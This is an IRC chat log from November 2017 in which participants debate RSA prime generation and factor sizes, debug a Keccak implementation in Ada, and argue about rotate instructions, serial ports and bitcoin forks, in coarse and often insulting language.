1739338;1510788626;PeterL_;hi, missed the 30 second window to identify as PeterL 1739339;1510788761;PeterL_;http://btcbase.org/log/2017-11-14#1737536 << for key generation, why not pick a p between say 2^512 and 2^3584 (or whatever values) until you find a prime, then look for a q between 2^4096/p and 2^4097/p ? 1739340;1510788761;a111;Logged on 2017-11-14 11:33 apeloyee: diana_coman: if keeping the minimum of 2^2047 for primes, you can, for example, generate primes between 2^2047 and 2^2049, and start over if the modulus is unacceptable. not sure what minimum for p and q makes sense. 1739341;1510788806;asciilifeform;why?! 1739342;1510788847;PeterL_;gives a wider range of possible values than just using a set bitness for both p and q 1739343;1510788886;PeterL_;and you end up with the right size of value for p*q , right? 1739344;1510788897;asciilifeform;how does it give a wider range ?! 1739345;1510788948;asciilifeform;not to mention that 2^4097 cannot be represented AT ALL in a 4096bit ffa 1739346;1510788959;asciilifeform;not even to divide by a p that guaranteed to not equal 1 1739347;1510788965;PeterL_;2^4097-1 ? 1739348;1510788992;asciilifeform;that yes 1739349;1510789010;asciilifeform;i still see no reason to do this 1739350;1510789045;asciilifeform;let p be any 4096b prime, let q be any 4096b prime, throw out both if pq exposes a high bit of 0 1739351;1510789052;asciilifeform;it's unbeatable and simple. 1739352;1510789114;PeterL_;I thought we were trying to get p and q where p*q is 4096b? 1739353;1510789124;asciilifeform;and my algo above guarantees it. 1739354;1510789138;asciilifeform;it simply won't terminate until pq is 4096b. 1739355;1510789155;PeterL_;I guess I was just trying to skip a few iterations of chucking out bad values? 1739356;1510789170;asciilifeform;there is no such thing as 'bad value' for individual p or q 1739357;1510789181;PeterL_;since once you get p, you should know the size q needs to be 1739358;1510789261;asciilifeform;neither can be greater than 2048b in size 1739359;1510789274;PeterL_;why not? 1739360;1510789285;asciilifeform;because ffa. 1739361;1510789293;PeterL_;I dun follow? 1739362;1510789306;asciilifeform;i deliberately removed support for non-powersof2 bitnesses. 1739363;1510789312;asciilifeform;to simplify karatsuba and other algos. 1739364;1510789328;asciilifeform;this was discussed here and if PeterL_ followed the logs, he would have noticed. 1739365;1510789330;PeterL_;but why do you limit to 2048 and not 4096? 1739366;1510789341;asciilifeform;either is a legal bitness 1739367;1510789350;asciilifeform;e.g. 3584 however is not 1739368;1510789368;asciilifeform;in a 4096b rsa run, p and q are 2048b primes 1739369;1510789386;PeterL_;why do they have to be 2048b? 1739370;1510789399;asciilifeform;because it's 4096b rsa. 1739371;1510789431;asciilifeform;and the difficulty of breaking rsa via known methods is proportional to the size of the smallest prime. you oughta know that. 1739372;1510789447;asciilifeform;this is 1st grade material. 1739373;1510789497;PeterL_;but isn't it easier to break knowing that they must be 2048b than if they could be anywhere within a wider range? 1739374;1510789503;asciilifeform;nope. 1739375;1510789589;PeterL_;hmm, I must have missed that day in 1st grade 1739376;1510789852;PeterL;http://btcbase.org/log/2017-11-15#1738855 << I am glad you find it useful 1739377;1510789852;a111;Logged on 2017-11-15 11:33 diana_coman: I've been playing around with the keccak implementation from PeterL and it seems overall all right 1739378;1510789929;asciilifeform;PeterL: consider, even plain brute force benefits from permitting one of the primes to have less than half of the total bitness of the product 1739379;1510790011;PeterL;but if pure brute forcing, why not start at sqrt(N) and work down? 1739380;1510790296;asciilifeform;PeterL: work out the chance, in your scheme, of the smaller prime being below 2048b in length. 1739381;1510790298;asciilifeform;it isn't small. 1739382;1510790329;asciilifeform;and much higher than the chance of any considerable number of leading 0s in p or q generated via proper scheme. 1739383;1510790364;asciilifeform;at any rate this is a quite pointless imho discussion, we will NOT be reintroducing normalized integer braindamage. 1739384;1510790388;asciilifeform;if you want to do crypto you do it with power-of-2-wide registers. 1739385;1510790413;asciilifeform;and the cost of the costliest operation is a cube of the bitness. 1739386;1510790792;PeterL;anyway, I have to go take care of the kids, as always I keep an eye on the logs. 1739387;1510790906;asciilifeform;PeterL: i am giving benefit of doubt, i'd rather think that you missed the powers-of-2-forever thread, rather than having read it and understood nothing 1739388;1510791408;asciilifeform;http://btcbase.org/log/2017-11-15#1739350 << err, 2048. 1739389;1510791408;a111;Logged on 2017-11-15 23:37 asciilifeform: let p be any 4096b prime, let q be any 4096b prime, throw out both if pq exposes a high bit of 0 1739390;1510801177;mircea_popescu;http://btcbase.org/log/2017-11-15#1739288 << who's gonna bother to fork worthless item, ya know. 1739391;1510801177;a111;Logged on 2017-11-15 20:30 asciilifeform: but instead a rerun of the august item 1739392;1510801441;mircea_popescu;http://btcbase.org/log/2017-11-15#1739321 << expensive tho, who the hell's gonna man all the castles. 1739393;1510801441;a111;Logged on 2017-11-15 20:54 asciilifeform: but rather confiscation of the whole shebang from the wreckers. 1739394;1510801447;mircea_popescu;need moar ppls. 1739395;1510801486;mircea_popescu;http://btcbase.org/log/2017-11-15#1739326 << yeah, something like that. 1739396;1510801486;a111;Logged on 2017-11-15 22:32 asciilifeform: hey mircea_popescu , radio havana reported 'tres muertos' in yer earthquake. 1739397;1510801516;asciilifeform;mircea_popescu: simply arresting the rot dun take much: i expect 'cuntoo' repo box will suffice. once isp winter is over... 1739398;1510801518;mircea_popescu;http://btcbase.org/log/2017-11-15#1739330 << thjat works, can even make the archive item a vpatch when it's done for instance. 1739399;1510801518;a111;Logged on 2017-11-15 22:41 lobbes: i.e. it still uses someone else's code for the 'core' irc functionality. I'd rather that core functionality be ircbot, but of course this'll be a huge time investment migrating everything (and learning lisp). In the hopper, though. 1739400;1510801658;mircea_popescu;http://btcbase.org/log/2017-11-15#1739372 << kek why so snippy 1739401;1510801658;a111;Logged on 2017-11-15 23:44 asciilifeform: this is 1st grade material. 1739402;1510801711;mircea_popescu;http://btcbase.org/log/2017-11-15#1739375 << the first factor found will necessarily be the smallest of p, q. therefore if your q is 17 and p some 4094 bit prime, you're fucked as the N will fall over within microseconds. 1739403;1510801711;a111;Logged on 2017-11-15 23:46 PeterL_: hmm, I must have missed that day in 1st grade 1739404;1510802355;asciilifeform;mircea_popescu: it's a pretty good olympiad problem, actually, to show why PeterL's scheme is still a bad idea even though '17' scenario is ruled out given as he capped the lower bitness at 512 1739405;1510802399;mircea_popescu;in other "obscure attempt at http://btcbase.org/log/2017-07-18#1685850 fares as well as could be expected", https://futurism.com/bitcoin-classic-shuts-down/ (evidently, 100% http://trilema.com/2016/and-they-wont-fucking-yield/ mode, "here's our next pick" bs) 1739406;1510802399;a111;Logged on 2017-07-18 03:17 mircea_popescu: the notion that bitcoin can somehow by stolen by name is so ridoinculous as to betray its ustardian origins. bitcoin is not a name. 1739407;1510802432;mircea_popescu;asciilifeform something moart than http://btcbase.org/log/2017-11-14#1737612 is needed ? 1739408;1510802432;a111;Logged on 2017-11-14 14:36 mircea_popescu: however you "cut" the problem out, the surface of the cut becomes the problem 1739409;1510802504;asciilifeform;i meant rigorous proof that the smallestprime will be on avg smaller in his scenario than in traditional 1739410;1510802889;asciilifeform;'It is now up to the next billion people to start to use Bitcoin Cash.' << lol!! 1739411;1510803014;asciilifeform;sooo they are also fraudulently pushing bch' ( or what it was) as a fork of bch ? 1739412;1510803047;asciilifeform;( reading the linked item, it would be impossible to infer that it is ~not~ one ) 1739413;1510806085;BingoBoingo;!!up kyliee 1739414;1510806086;deedbot;kyliee voiced for 30 minutes. 1739415;1510806089;BingoBoingo;Hello kyliee 1739416;1510806115;kyliee;Hi 1739417;1510806142;BingoBoingo;What brings you out to these here boondocks? 1739418;1510806223;kyliee;Bitcoin... I need to understand how to trade without using one of the government run platforms 1739419;1510807196;kyliee;GODDAMMIT 1739420;1510808041;BingoBoingo;!~later tell kyliee Pls to learn patience 1739421;1510808041;jhvh1;BingoBoingo: The operation succeeded. 1739422;1510812383;BingoBoingo;!~ticker --market all 1739423;1510812391;jhvh1;BingoBoingo: Bitstamp BTCUSD last: 7222.59, vol: 14684.62002310 | Bitfinex BTCUSD last: 7220.0, vol: 60507.0461593 | Kraken BTCUSD last: 7210.0, vol: 7585.25528369 | Volume-weighted last average: 7219.54311677 1739424;1510813017;*;BingoBoingo still has more tax law to read, but new rough number is 61.615 USd/week per RU or 267 USd/monthly per RU 1739425;1510813179;BingoBoingo;Calculated as 2*{[(monthly rack with 22% VAT)/(40 Salable RU)]*(12 Months)}/(52 weeks) 1739426;1510813191;BingoBoingo;Figure subject to change as more tax law is digested 1739427;1510813622;BingoBoingo;This is a reduction of ~21.47% over number from last night taken through weekification and de-fxrisking transform. 1739428;1510814961;BingoBoingo;And in latest Pantsuit purge developments pro-muscleman can be victim too https://archive.is/vjeDN 1739429;1510831643;apeloyee;http://btcbase.org/log/2017-11-15#1739374 << can you enlighten us about why you believe there's no way to use information about range of factors (because you say so?), and about the http://btcbase.org/log/2017-11-15#1739371 as regards the number field sieve, as this doesn't seem to be published (or perharps for quadratic sieve). elliptic curve does benefit from smaller factors, but if the... 1739430;1510831643;a111;Logged on 2017-11-15 23:45 asciilifeform: nope. 1739431;1510831643;a111;Logged on 2017-11-15 23:43 asciilifeform: and the difficulty of breaking rsa via known methods is proportional to the size of the smallest prime. you oughta know that. 1739432;1510831645;apeloyee;...factors differ only a few bits in length, it doesn't appear to be better than NFS. 1739433;1510831823;apeloyee;http://btcbase.org/log/2017-11-15#1739383 << you can just use 4096*4096 multiplies. It's lulzy to see how you rant about "proper" rsa and demand full-size exponents, but somehow restricting range of p and q is OK. 1739434;1510831823;a111;Logged on 2017-11-15 23:59 asciilifeform: at any rate this is a quite pointless imho discussion, we will NOT be reintroducing normalized integer braindamage. 1739435;1510837982;mircea_popescu;http://btcbase.org/log/2017-11-16#1739412 << i don't think anything besides the stringing of words is seriously contemplated. 1739436;1510837982;a111;Logged on 2017-11-16 03:30 asciilifeform: ( reading the linked item, it would be impossible to infer that it is ~not~ one ) 1739437;1510838052;mircea_popescu;http://btcbase.org/log/2017-11-16#1739424 << is the first figure with customer's gear and the second with yours ? 1739438;1510838052;a111;Logged on 2017-11-16 06:16 BingoBoingo still has more tax law to read, but new rough number is 61.615 USd/week per RU or 267 USd/monthly per RU 1739439;1510838080;mircea_popescu;ah sorry my bad, week/month nm 1739440;1510838151;mircea_popescu;im getting at least 4, so. proceed. 1739441;1510838370;mircea_popescu;http://btcbase.org/log/2017-11-16#1739432 << factors differing by only a few bits in length aren't particularily unsafe, which is why the original alt-rsa spec involved them (see eg http://btcbase.org/log/2017-08-14#1697613 and the eventual end of that discussion.) 1739442;1510838370;a111;Logged on 2017-11-16 11:27 apeloyee: ...factors differ only a few bits in length, it doesn't appear to be better than NFS. 1739443;1510838370;a111;Logged on 2017-08-14 17:21 mircea_popescu: tmsr rsa standard key is 515 bits, made out of a 257 and a 258 bit long prime. 1739444;1510838413;mircea_popescu;factors that are very small are trivially a vulnerability, as the 17 example shows. what is "small enough" is somewhat of an open question, but 512 BITS does conceiovably qualify. 1739445;1510838504;mircea_popescu;there's no argument that informations about range of factors CAN be used. the point is minorily that a) a range of 2045 bits is sufficient and majorily that b) should this range NOT be sufficient, the correct response is to extend IT, rather than to introduce key-substitute mechanisms in the actual encryption scheme. 1739446;1510838533;mircea_popescu;ie, "you have the following information about any and all factors : they're 11 led, 1 terminated, 2045 true random bits. knock yourself out." 1739447;1510838771;mircea_popescu;yes, in about 6% of cases the N will come out as 111..., in which case you know that both p and q are actually 1111 1111 led, ie you'll have 2 bits of each. and in 0.001% of cases N will led by FF and have the next bit set, so you'll know both p and q have the first octet set. if you have an extension attack allowing you to parlay 8 leading bits into the prime exposure, you can thereby crack rsa in 0.001% of cases. 1739448;1510838797;mircea_popescu;as far as anyone knows, something closer to 450 bits is what's actually needed. 1739449;1510838941;mircea_popescu;this whole thing aside, the only objection to http://btcbase.org/log/2017-11-16#1739433 ie, "produce sets of 2048 bits, check them for primality, if they're prime multiply them and if the product is a suitable N keep them else start over" was http://btcbase.org/log/2017-11-14#1737682 1739450;1510838941;a111;Logged on 2017-11-16 11:30 apeloyee: http://btcbase.org/log/2017-11-15#1739383 << you can just use 4096*4096 multiplies. It's lulzy to see how you rant about "proper" rsa and demand full-size exponents, but somehow restricting range of p and q is OK. 1739451;1510838941;a111;Logged on 2017-11-14 15:01 mircea_popescu: http://btcbase.org/log/2017-11-14#1737387 << this is alternatively a perfectly acceptable approach ; expensive as all fuck though. prolly should be the standard for homemade keys. 1739452;1510839483;mircea_popescu;it may appear beneficial to instead produce larger sets, such as of 4096 bits. the UPPER BOUND of the gain from this process is known ; the lower bound of losses from it is not known, because yes if you allow 4096 bit p, q and test, an acceptable N can be composed of the product between 17 and 2^4092 - 177 or whatever it was. 1739453;1510839522;mircea_popescu;so logically if indeed the larger upper bound was deemed useful we'd move the standard to 8192 bits N with 4096 bit p/q rather than do this. 1739454;1510840644;mircea_popescu;aaand in other lulz, https://blog.josefsson.org/2016/11/03/why-i-dont-use-2048-or-4096-rsa-key-sizes/ 1739455;1510840822;mircea_popescu;cultivated enough to mention bernstein&gf curve, uncomprehending enough to "post quantum algorithms". how do these happen, i wish to know. 1739456;1510841394;mircea_popescu;other lulz, same source : https://blog.josefsson.org/2017/08/03/vikings-d16-server-first-impressions/ (apparently there's an entire kanzure 's wanker club dedicated to republican hosting ; vikings.net and whatnot. doesn't seem to be actually working though, but i did join their irc, see what happens. 1739457;1510842095;asciilifeform;http://btcbase.org/log/2017-11-16#1739429 << forget public nfsieve. consider ordinary bruteforce ('but how brute force for soomanybits??!' ) on novel physical substrate, or with a heuristic that lets you skip large chunks of space 1739458;1510842095;a111;Logged on 2017-11-16 11:27 apeloyee: http://btcbase.org/log/2017-11-15#1739374 << can you enlighten us about why you believe there's no way to use information about range of factors (because you say so?), and about the http://btcbase.org/log/2017-11-15#1739371 as regards the number field sieve, as this doesn't seem to be published (or perharps for quadratic sieve). elliptic curve does benefit from smaller factors, but if the... 1739459;1510842146;asciilifeform;'state of the art' means ANY attack that i can describe. 1739460;1510842149;mircea_popescu;or consider something as simple as phuctor, that already has a lot of "special" primes, however you define special (small, common, whatevewr) 1739461;1510842153;asciilifeform;aaha. 1739462;1510842198;mircea_popescu;the importance of a phuctor style primorial+commonkeyset gcding away is somehow easily overlooked by academic minds. but in practical terms it is the first line, degree (or even two!) ahead of haskelism a la gnfs 1739463;1510842225;asciilifeform;http://btcbase.org/log/2017-11-16#1739433 << lol next this fella will say, i suspect, 'why do you restrict the range of N' 1739464;1510842225;a111;Logged on 2017-11-16 11:30 apeloyee: http://btcbase.org/log/2017-11-15#1739383 << you can just use 4096*4096 multiplies. It's lulzy to see how you rant about "proper" rsa and demand full-size exponents, but somehow restricting range of p and q is OK. 1739465;1510842295;mircea_popescu;asciilifeform incidentally, bernstein's curve implementation is ALSO free of branching on secret bits, have you seen that thing ? 1739466;1510842325;asciilifeform;which one 1739467;1510842329;asciilifeform;he has a buncha 1739468;1510842360;mircea_popescu;http://ed25519.cr.yp.to/software.html 1739469;1510842380;mircea_popescu;not entirely clear yet if he just AIMED to avoid all secret bit branching or actulaly managed. 1739470;1510842385;mircea_popescu;but the attempt is evident. 1739471;1510842394;asciilifeform;i only see pyturds 1739472;1510842404;mircea_popescu;yes. 1739473;1510842419;asciilifeform;crypto in a gclang is an absurdity 1739474;1510842422;mircea_popescu;yes. 1739475;1510842425;mircea_popescu;not discussing that part. 1739476;1510842426;asciilifeform;of course it branches on seekritz 1739477;1510842456;asciilifeform;or hm you were prolly thinking of the asm one 1739478;1510842469;mircea_popescu;here, worth pasting : http://p.bvulpes.com/pastes/UFtzz/?raw=true 1739479;1510842472;mircea_popescu;consider it pseudocode 1739480;1510842503;asciilifeform;if e & 1: t = (t*b) % m 1739481;1510842515;asciilifeform;it ain't pseudocode for anything useful 1739482;1510842520;mircea_popescu;hater. 1739483;1510842546;mircea_popescu;exp is not secret 1739484;1510842634;*;asciilifeform not much into eccism, regards its presence in btc as a bug 1739485;1510842667;asciilifeform;http://btcbase.org/log/2017-11-16#1739455 << not so surprising, considering that bernstein himself is a quantumist 1739486;1510842667;a111;Logged on 2017-11-16 14:00 mircea_popescu: cultivated enough to mention bernstein&gf curve, uncomprehending enough to "post quantum algorithms". how do these happen, i wish to know. 1739487;1510842727;diana_coman;asciilifeform, what is "eccism" ? 1739488;1510842750;mircea_popescu;elliptic curve based crypto 1739489;1510842752;asciilifeform;diana_coman: elliptic curve cipher 1739490;1510842806;diana_coman;ah, thanks 1739491;1510842883;asciilifeform;http://btcbase.org/log/2017-11-16#1739454 << pretty deep lol , 'I chose a RSA key size of 3925 for my blog' and d00d dun seem to realize that it's exactly a 4096b modulus wit 171 leading zeros ... 1739492;1510842883;a111;Logged on 2017-11-16 13:57 mircea_popescu: aaand in other lulz, https://blog.josefsson.org/2016/11/03/why-i-dont-use-2048-or-4096-rsa-key-sizes/ 1739493;1510842891;mircea_popescu;aha 1739494;1510842907;mircea_popescu;exactly in the vein above. "understands how to add, thinks 4>5." 1739495;1510842909;mircea_popescu;how the fuck. 1739496;1510842923;mircea_popescu;it's like penis cage for the brain, somehow. 1739497;1510842943;asciilifeform;by refusing to add. 'i'm too clean to touch a shovel' is the likely pathology. 1739498;1510842969;mircea_popescu;in other ongoing lulzvelopments, http://p.bvulpes.com/pastes/kP8vH/?raw=true 1739499;1510843012;asciilifeform;crowdfunding lol 1739500;1510843033;mircea_popescu;got 3-4k together so far. but they do seem vaguely promising, maybe. 1739501;1510843049;mircea_popescu;if can be cleanned enough ; always a dubious proposition in english speakers. 1739502;1510843066;asciilifeform;folx without ideology are like dodo. simply waiting for the ship fulla dogs to land. 1739503;1510843076;diana_coman;PeterL, did you test your permutation step functions on that keccak implementation? when I feed rho a full-zero state it seems to end up with non-zero output 1739504;1510843153;asciilifeform;diana_coman: interesting, and it still passed the test vectors despite this ?? 1739505;1510843167;diana_coman;asciilifeform, serpent passed the test vectors!! 1739506;1510843181;diana_coman;NOT keccak; serpent 1739507;1510843195;diana_coman;now torturing keccak and... 1739508;1510843212;asciilifeform;aaaa 1739509;1510843216;mircea_popescu;did it pass any others ? 1739510;1510843322;diana_coman;mircea_popescu, well, he had those step functions private so initially inaccessible; so first I've tried a full test (i.e. input is this, do full keccak round, output should be this): it failed; so then I grunted through exposing the step functions at least at this stage and testing bit by bit; 1739511;1510843338;mircea_popescu;and first one failed ? 1739512;1510843349;diana_coman;rho step is second,what can I say; first one passed, yes (theta) 1739513;1510843354;mircea_popescu;aha. 1739514;1510843990;diana_coman;rho uses that Rotate_Left function which is imported from gnat; I'd rather not have it in a reference implementation tbh 1739515;1510844001;diana_coman;I guess I'll test that one now... 1739516;1510844088;asciilifeform;diana_coman: how do you propose to rotate without it ? as i see it, the language standard simply has a rotate-shaped hole in it 1739517;1510844270;diana_coman;asciilifeform, I don't yet know the answer to that; I'm still eating Ada so I can't decide either way; still, I don't ...like it, that's all I said; perhaps there is no solution to it, perhaps there is one 1739518;1510844388;asciilifeform;afaik there isn't a proper solution. 1739519;1510844462;asciilifeform;it's a single fucking cpu instruction on ~all known cpu. and yet some wrecker saw it fit to exclude it from the language standard. 1739520;1510844479;asciilifeform;exactly same nonsense as the carry flag thing 1739521;1510844536;asciilifeform;motherfuckers, there is not a single comp made in 40 years that doesn't have a carry flag. WHY YOU HID IT 1739522;1510844556;asciilifeform;it's infuriating 1739523;1510844616;asciilifeform;gcc offers a built-in rotate 'illicitly', but not a portable access to carry flag. because ALSO run by wreckers. 1739524;1510844633;asciilifeform;result is a 4x slower ffa. 1739525;1510844665;asciilifeform;('use asm' is not an answer, i want, as diana_coman wants, a PORTABLE proggy ) 1739526;1510844873;asciilifeform;diana_coman: the sad fact re gnat is that it is in fact the only ada. being as the 'alternatives' are, without exception, closed winturds. 1739527;1510845366;diana_coman;asciilifeform, yes, portable is the rub there; I'll read more on ada for now, nothing much to add atm 1739528;1510845572;mircea_popescu;http://btcbase.org/log/2017-11-16#1739520 << we can afford to inline asm, seeing how minigame knows what iron it runs it on. 1739529;1510845572;a111;Logged on 2017-11-16 15:01 asciilifeform: exactly same nonsense as the carry flag thing 1739530;1510845577;mircea_popescu;as a forinstance. 1739531;1510845613;asciilifeform;discussion was re 'reference implementation' 1739532;1510845622;asciilifeform;naturally on particular iron you can asm 1739533;1510845648;mircea_popescu;hey, minigame produced reference implementation of ada keccak can well contain inline asm rotation, and who dun like it can do whatever they will. 1739534;1510845658;mircea_popescu;reference means "what works for me" not "what works for others". 1739535;1510845681;asciilifeform;'reference' has no business baking in whatever quirks of intelism, known & unknown 1739536;1510845690;mircea_popescu;not per se. 1739537;1510845706;mircea_popescu;but reference also has no business baking in whatever quirks of "human rights & the fyotoor", known & unknown. 1739538;1510845735;asciilifeform;imho if you're gonna have asm, may as well write whole thing in it 1739539;1510845748;mircea_popescu;just as reference implementation will bake in FG, and users of others are responsible for others' quirks. 1739540;1510845754;asciilifeform;whereas the point of using an algorithmic lang is readability & portability. 1739541;1510845763;mircea_popescu;where feasible. 1739542;1510845773;asciilifeform;FG is a straight serial device tho, it doesn't lock you into any particular form 1739543;1510845780;mircea_popescu;irrespective. 1739544;1510845785;asciilifeform;iirc diana_coman simply opens /dev/ttywherever and reads. 1739545;1510845808;mircea_popescu;aaand asm rotate is a straight asm item, it doesn't lock you etcetera. 1739546;1510845821;mircea_popescu;"oh but mp, other people do it via shortwave radio" "good for them." 1739547;1510845827;asciilifeform;lol 1739548;1510845839;diana_coman;aand found the bug at least on this one: rho initialises Ar(0,0) BUT uses then first thing...Ar(1,0) 1739549;1510845855;asciilifeform;diana_coman: PeterL by his own admission didn't test the thing at all 1739550;1510845872;mircea_popescu;i suppose ye age olde "i didn't know there was interest" at play. 1739551;1510845872;asciilifeform;i'm a little surprised that any part of it worked. 1739552;1510845893;diana_coman;asciilifeform, it is straightforward from algo descriptions in the reference 1739553;1510845907;asciilifeform;evidently not straightforward enuff.. 1739554;1510845911;diana_coman;the ref is quite good in this respect I'd say, not that hard to follow 1739555;1510845921;diana_coman;well, they did not give you the init of variables wtf! 1739556;1510846013;asciilifeform;returning to http://btcbase.org/log/2017-11-16#1739533 , i will point out that inline asm is ~likewise~ a gcc-specific syntax. so if you're marrying gcc you may as well use the existing ( as seen in ffa ) rotate intrinsic. 1739557;1510846013;a111;Logged on 2017-11-16 15:20 mircea_popescu: hey, minigame produced reference implementation of ada keccak can well contain inline asm rotation, and who dun like it can do whatever they will. 1739558;1510846049;mircea_popescu;maybe i didn't make the inline incantation sufficiently magical, but anyway. "straight asm", what'd you prefer. 1739559;1510846073;asciilifeform;if yer doing a great deal of hashing , straight asm could be a win 1739560;1510846073;mircea_popescu;"rotation can be directly an opcode item linked as such", how about that. 1739561;1510846196;mircea_popescu;tbh, this item aside (it was just given as an ~example~ anyway), i do not expect that on the medium term we will be able to avoid "and here's the special asm library, links at link time with the rest of compiled shit" situations. 1739562;1510846204;mircea_popescu;afaik lisp never actually avoided this either. 1739563;1510846273;hanbot;meanwhile, what do you call a frenchman wearing sandals? 1739564;1510846282;mircea_popescu;a... hm. a vandal ? 1739565;1510846291;hanbot;Phillipe Phillope 1739566;1510846296;mircea_popescu;ahahaha\ 1739567;1510846398;mircea_popescu;http://btcbase.org/log/2017-11-16#1739542 << this is particularily hysterical given the http://btcbase.org/log-search?q=pl2303x lulz. 1739568;1510846398;a111;Logged on 2017-11-16 15:22 asciilifeform: FG is a straight serial device tho, it doesn't lock you into any particular form 1739569;1510846896;mircea_popescu;meanwhile in parkour, http://78.media.tumblr.com/494e71a43850359399171b48966b1dea/tumblr_nl5dlpOjCh1up90kvo1_1280.jpg 1739570;1510847048;asciilifeform;i dun make the pl2303 or the related rubbishes 1739571;1510847055;asciilifeform;my personal fg is plugged into a serial port. 1739572;1510847076;asciilifeform;( and is made of junkyard parts, given as the actual FG stock is s.nsa inventory, lol ) 1739573;1510847191;asciilifeform;http://btcbase.org/log/2017-11-16#1739561 << possibly i mentioned this, i am making an asm ffa in parallel with the ada item 1739574;1510847191;a111;Logged on 2017-11-16 15:29 mircea_popescu: tbh, this item aside (it was just given as an ~example~ anyway), i do not expect that on the medium term we will be able to avoid "and here's the special asm library, links at link time with the rest of compiled shit" situations. 1739575;1510847205;asciilifeform;but the latter is to be the reference, and the former -- i 'hand compile' ~from~ the reference 1739576;1510847443;mircea_popescu;asciilifeform how do you think anyh of that is relevant ? 1739577;1510847488;mircea_popescu;"my personal fg is plugged into serial port and my personal ada keccak is plugged into iron on which asm works". da fuck special pleading is this. 1739578;1510847950;apeloyee;http://btcbase.org/log/2017-11-16#1739523 << http://www.ada-auth.org/standards/rm12_w_tc1/html/RM-B-2.html 1739579;1510847950;a111;Logged on 2017-11-16 15:03 asciilifeform: gcc offers a built-in rotate 'illicitly', but not a portable access to carry flag. because ALSO run by wreckers. 1739580;1510848068;apeloyee;it's a part of the standard, but, sadly, optional. 1739581;1510848092;apeloyee;however... 1739582;1510848103;apeloyee;!#s alternatives to gnat 1739583;1510848104;a111;1 result for "alternatives to gnat", http://btcbase.org/log-search?q=alternatives%20to%20gnat 1739584;1510848561;asciilifeform;mircea_popescu: rs232 is a 1960s standard, and doesn't go away simply because wintel stopped including the plug on the mobo. and world's simplest and most widely-supported standard for digital comms, moar so than ethernet ( i have whole pile of devices with 0 nic but several serialports ) , and will remain, regardless of what wintel does. 1739585;1510848565;asciilifeform;so i dun see how 'special plead' 1739586;1510848578;asciilifeform;apeloyee: i never grasped the lunacy of 'standard with optional pieces' 1739587;1510848929;asciilifeform;back to rs232 -- it's the lingua franca . not the most snobbish ibm mainframe (which even eschewed ascii) , nor the most orcish bk0010 , nobody, ever omitted serial port. until 2010s, obummer-era pc junk. 1739588;1510848982;asciilifeform;if you dun have serial, you dun have a comp, in entirely the same way that if you cannot read latin letters you are not literate. 1739589;1510849146;asciilifeform;( nitpickers will note that rs232 implies particular voltages . and yes, you need a voltage converter to use ttl (e.g. fg) with actual rs232. which is inevitable, because i did not want to put a 200kHz-oscillating 5v to plusminus12v chip on fg. ) 1739590;1510849180;asciilifeform;you likewise need exactly same voltage converter for pogo , and most other small devices. 1739591;1510849200;asciilifeform;but the logical protocol is classical rs232, 115200/8/1/noparity. 1739592;1510849310;asciilifeform;to try to make analogy between world's single most supported electrical standard after 220v mains socket, and intel turdolade, is beyond ludicrous. 1739593;1510849503;*;asciilifeform bbl, meat 1739594;1510849926;apeloyee;motherfuckers, there is not a single comp made in 40 years that doesn't have a carry flag. << *excluding non-actual computers. 1739595;1510850501;apeloyee;risc-v wreckers specified no carry flag, for instance 1739596;1510851412;apeloyee;on novel physical substrate << you must be designing not just post-quantum, but post-thermodynamic crypto. :P 1739597;1510851734;mircea_popescu;asciilifeform and "asm rot" is a standard etc. 1739598;1510851746;mircea_popescu;"doesn't go away just because intel stops including it" to ~same degree. 1739599;1510851974;mircea_popescu;to put the point on its proper footing : convention is convention, no different than any other convention. convention doth not become physical law through wide adoption, irrespective how extensive that wideness, in headcount, time, whatever. 1739600;1510852056;mircea_popescu;if the convention can be "you'll need a serial capable machine", as it HAS to can be, then convention can also be "you'll need a cpu with ror/rol implemnented". whether it is decided to make it so has no bearing on whether it could be decided to make it so. that's a 1 : it could be. 1739601;1510852161;mircea_popescu;and so back to the original, there can't "not be alternatives" to gnat. leaving aside the in principle argument, there's alternative by example : expose the cpu instruction and woe to anyone who won't/can't/doesn't. 1739602;1510852575;mircea_popescu;and dang, why is this bch so totally taking over! 1739603;1510853202;asciilifeform;mircea_popescu: point is, that is no longer an ada proggy. 1739604;1510853224;asciilifeform;you lose the guarantees. 1739605;1510853228;mircea_popescu;well, the part that's ada is ada and the part that dun work or isn't wanted in ada... isn't ada. 1739606;1510853230;mircea_popescu;just like irl. 1739607;1510853284;mircea_popescu;gcc or w/e you use as a compiler,. for instance, also not an ada proggy. ada dun even try what lisp tried and failed to obtain, ie, a full universe. 1739608;1510853294;asciilifeform;aaactually 1739609;1510853297;mircea_popescu;yes yes 1739610;1510853298;asciilifeform;gnat is an ada proggy. 1739611;1510853339;mircea_popescu;(and provides its own inline asm too) 1739612;1510853355;asciilifeform;but as we discussed in old thread, the single most serious problem of ada, is that it is quite difficult to implement an adatron. esp if you actually go for standard compliance. 1739613;1510853366;asciilifeform;it isn't a straight imbecile mapping to the idjit cmachine cpu, as c is. 1739614;1510853371;mircea_popescu;so then. 1739615;1510853477;asciilifeform;standard compliance (we also had thread) is a massively underappreciated thing. it is why, e.g., diana_coman was able to take the serpent thing and build it, cleanly and without change, 20+yrs after its writing 1739616;1510853487;asciilifeform;and why phf is able to execute 40 y.o. macsyma , ditto 1739617;1510853505;mircea_popescu;history is traditionally anti-valuable to the plebs. 1739618;1510853509;asciilifeform;( and why my 1980s serial boxen still work, etc ) 1739619;1510853516;asciilifeform;nao this is troo 1739620;1510853532;mircea_popescu;gets in teh way of all that justwantto. 1739621;1510853537;asciilifeform;see also http://btcbase.org/log/2016-08-04#1514935 1739622;1510853537;a111;Logged on 2016-08-04 19:59 mircea_popescu: but it's certainly quite deep. the vermin doesn't merely aim to a comfortable existence, but more importantly to a memory-less situation. 1739623;1510853556;mircea_popescu;incidentally, what's the ms-dos gnat compiler ? also gcc ? 1739624;1510853569;asciilifeform;also 1739625;1510853577;asciilifeform;it dun do 16bit mode, sadly, tho 1739626;1510853582;asciilifeform;and afaik nobody ever did 1739627;1510853583;mircea_popescu;meanwhile in useless tards, https://www.adacore.com/developers/development-log/NF-503-D817-011-gnat 1739628;1510853598;asciilifeform;i see eggog 1739629;1510853610;mircea_popescu;me too. 1739630;1510853638;mircea_popescu;aand in the same vein : http://www.ada-programming.info/ASM_86_file_for_use_with_GNAT_for_MS_DOS_jQxM.html 1739631;1510853654;asciilifeform;btw http://btcbase.org/log/2017-11-16#1739595 is entirely correct, and quite surreal 1739632;1510853654;a111;Logged on 2017-11-16 16:41 apeloyee: risc-v wreckers specified no carry flag, for instance 1739633;1510853664;mircea_popescu;"Cloudflare Always Online allows you to read this idiotic banner on content which, unlike cloudflare, is actually valuable and no 